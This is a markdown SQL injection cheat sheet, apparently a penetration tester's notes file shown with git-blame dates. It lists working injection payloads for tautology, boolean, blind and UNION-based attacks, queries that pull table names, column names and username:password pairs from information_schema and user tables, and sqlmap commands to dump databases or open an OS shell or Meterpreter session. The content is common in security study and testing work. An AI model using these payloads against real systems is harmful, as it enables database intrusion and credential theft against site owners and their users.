2021-08-23 01:13:54 +02:00
|
|
|
# SQL Injection
|
|
|
|
|
|
|
|
|
|
# Finding an Opportunity
|
|
|
|
|
* GET parameter
|
|
|
|
|
```sh
|
|
|
|
|
http://example.com/index.php?id=' or 1=1 -- -
|
|
|
|
|
```
|
|
|
|
|
* Provoke error to gain information
|
|
|
|
|
```sh
|
|
|
|
|
http://example.com/index.php?id='
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
# Usage
|
|
|
|
|
|
|
|
|
|
* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--`
|
|
|
|
|
```sql
|
|
|
|
|
SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- -
|
|
|
|
|
SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
* Boolean True and False
|
|
|
|
|
```sql
|
|
|
|
|
SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+
|
|
|
|
|
SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
* Blind injection // Guessing characters
|
|
|
|
|
```sh
|
|
|
|
|
http://example.com/?id=1' substr((select database()),1,1)) < 105 --+
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### Union based
|
|
|
|
|
* Check number of cols
|
|
|
|
|
```sql
|
|
|
|
|
' UNION SELECT NULL--
|
|
|
|
|
' UNION SELECT NULL,NULL--
|
|
|
|
|
' UNION SELECT NULL,NULL,NULL--
|
|
|
|
|
# until the error occurs
|
|
|
|
|
```
|
|
|
|
|
* Check which one is a string
|
|
|
|
|
```sql
|
|
|
|
|
' UNION SELECT 'a',NULL,NULL,NULL--
|
|
|
|
|
' UNION SELECT NULL,'a',NULL,NULL--
|
|
|
|
|
' UNION SELECT NULL,NULL,'a',NULL--
|
|
|
|
|
' UNION SELECT NULL,NULL,NULL,'a'--
|
|
|
|
|
```
|
|
|
|
|
* Retrieve content, for cols and comment two times as an example. Or dump database
|
|
|
|
|
```sql
|
|
|
|
|
' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- //
|
|
|
|
|
' UNION SELECT NULL,username,password,NULL FROM users -- //
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection)
|
|
|
|
|
|
2021-09-02 01:19:53 +02:00
|
|
|
#### SQL Functions
|
|
|
|
|
* Use sql functions to fumble the tables & cols via union
|
|
|
|
|
* [source](https://medium.com/@nyomanpradipta120/sql-injection-union-attack-9c10de1a5635)
|
|
|
|
|
* Extract tables
|
|
|
|
|
```sql
|
|
|
|
|
1' and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema = database() -- -
|
|
|
|
|
```
|
|
|
|
|
* Extract cols
|
|
|
|
|
```sh
|
|
|
|
|
1' and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema = database() and table_name ='user'-- -
|
|
|
|
|
```
|
|
|
|
|
* Data from cols
|
|
|
|
|
```sql
|
|
|
|
|
1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
|
|
|
|
|
```
|
|
|
|
|
|
2021-08-23 01:13:54 +02:00
|
|
|
## Tools
|
|
|
|
|
### SQLmap
|
|
|
|
|
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
|
|
|
|
|
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
|
|
|
|
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
|
|
|
|
|
* Use `-r` with a saved HTTP request
|
|
|
|
|
```sh
|
|
|
|
|
sqlmap -r request.txt --dbms=mysql --dump
|
|
|
|
|
sqlmap -r request.txt --batch
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|Parameter|Details|
|
|
|
|
|
|-r|Uses the intercepted request save as a file|
|
|
|
|
|
|--dbms|DBMS of target|
|
|
|
|
|
|--dump|Dump the entire database|
|
|
|
|
|
|--dump-all|Dump everything|
|
|
|
|
|
|-p |TESTPARAMETER|
|
|
|
|
|
|--os-shell|Prompt for an interactive operating system shell|
|
|
|
|
|
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|
|
|
|
|
|
|
|
|
|
### Damn Small SQLi Scanner (DSSS)
|
|
|
|
|
* [Script](https://github.com/stamparm/DSSS.git)
|
|
|
|
|
```sh
|
|
|
|
|
python dsss.py -u "http://example.com/index.php?id="
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### Online sqlmap
|
|
|
|
|
* [Link](https://suip.biz/?act=sqlmap)
|
|
|
|
|
|
|
|
|
|
## Payloads
|
|
|
|
|
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
|
